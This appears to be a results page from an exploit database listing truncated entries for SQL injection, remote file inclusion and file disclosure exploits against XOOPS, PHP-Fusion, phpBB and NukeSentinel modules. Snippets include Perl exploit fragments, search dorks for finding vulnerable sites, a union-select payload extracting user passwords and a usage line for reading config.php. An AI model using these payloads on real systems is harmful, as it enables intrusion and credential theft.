1620 matches found
Sql injection
SQL injection vulnerability in index.php in the MyAds 2.04jp and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the cid parameter, different vectors than CVE-2006-3341...
Xoops Module Zmagazine 1.0 (print.php) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: XOOPS Module Zmagazine 1.0 print.php Remote BLIND SQL Injection Exploit Coded by : ajann Author : ajann Contact : : Dork : "inurl:/modules/zmagazine/" Result:20.800 Example S. :...
phpfusion2-sql.txt
!/usr/bin/perl -w PHP-Fusion 'CalendarPanel' Module showevent.PHP mmonth SQL Injection Exploit And PoC Type : SQL Injection Release Date : 2007-03-31 Product : http://php-fusion.co.uk/ Bug : http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0 PoC :...
Xoops Module Camportail <= 1.1 (camid) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: XOOPS Module Camportail = 1.1 camid Remote BLIND SQL Injection Exploit Coded by : ajann Author : ajann Contact : : Dork : inurl:/modules/camportail/ S.Page : http://123rando.com/ $$ : Free .. : ajann,Turkey use IO::Socket; if@ARGV 1...
XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
No description provided by source. html head titleXOOPS Module XFsection = 1.07 articleid BLIND SQL Injection Exploit/title script type="text/javascript" //'=============================================================================================== //'Script Name: XOOPS Module XFsection = 1.0...
XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
Exploit for unknown platform in category web applications ====================================================================== XOOPS Module XFsection XOOPS Module XFsection //'=============================================================================================== //'Script Name: XOOPS...
PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection
-------------------------------- PHP-FUSION Arcade Module cid Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoron.biz -------------------------------- Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/...
XOOPS Module Tiny Event 1.01 - id SQL Injection
XOOPS Module Tiny Event 1.01 - id SQL Injection !/usr/bin/perl Script Name: XOOPS Module Tiny Event : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id;...
XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection Exploit
Exploit for unknown platform in category web applications ============================================================ XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection Exploit ============================================================ XOOPS Module RM+Soft Gallery 1.0categos.php BLIND SQL...
XOOPS Module Tiny Event 1.01 - 'id' SQL Injection
!/usr/bin/perl Script Name: XOOPS Module Tiny Event : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id; $target =...
XOOPS Module MyAds Bug Fix 2.04jp - index.php SQL Injection
XOOPS Module MyAds Bug Fix 2.04jp - index.php SQL Injection !/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; $target =...
XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit
Exploit for unknown platform in category web applications ====================================================================== XOOPS Module MyAds Bug Fix : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR...
XOOPS module Articles 1.03 - index.php?cat_id SQL Injection
XOOPS module Articles 1.03 - index.php?catid SQL Injection !/usr/bin/perl Script Name: Xoops module Articles : "; $dir = ; chop...
XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== XOOPS Module Friendfinder : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR...
XOOPS Module Friendfinder 3.3 - 'view.php?id' SQL Injection
!/usr/bin/perl Script Name: Xoops Module Friendfinder : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id; $target =...
PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
PHP Module Implementationtop.php laypathRemote File Include Vul ^ Downlaoad S : http://sourceforge.net/projects/phpmip/ ^ Author: GolDM = Mahmoodali && Contact: [email protected] ^ In: /path/top.php ^ Vulnerable Code: ^ include"$laypath/body.php"; Line : 23 ^ Exploit:...
phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion
!/usr/bin/perl phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit Coded by bd0rk || SOH-Crew Usage: exploit.pl target cmd shell shell variable Greetings: str0ke, TheJT, Kacper, Lu7k, Maik Vulnerable Code: includeonce$phpbbrootpath . 'includes/functionsadmin.'.$phpEx; vendor:...
Authentication flaw
Unspecified vulnerability in the Secure site 4.7.x-1.x-dev and 5.x-1.x-dev module for Drupal allows remote attackers to bypass access restrictions via a crafted URL...
NukeSentinel 2.5.05 - 'nukesentinel.php' File Disclosure
!/usr/bin/php File Disclosure Maybe work on other versions. Interesting exploit = if$argc URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------ Usage: $argv0 -url -file Options Example: $argv0 -url http://www.victim.com/ -file config.php Options:...
ejabberd roster ODBC module vulnerability
No description provided...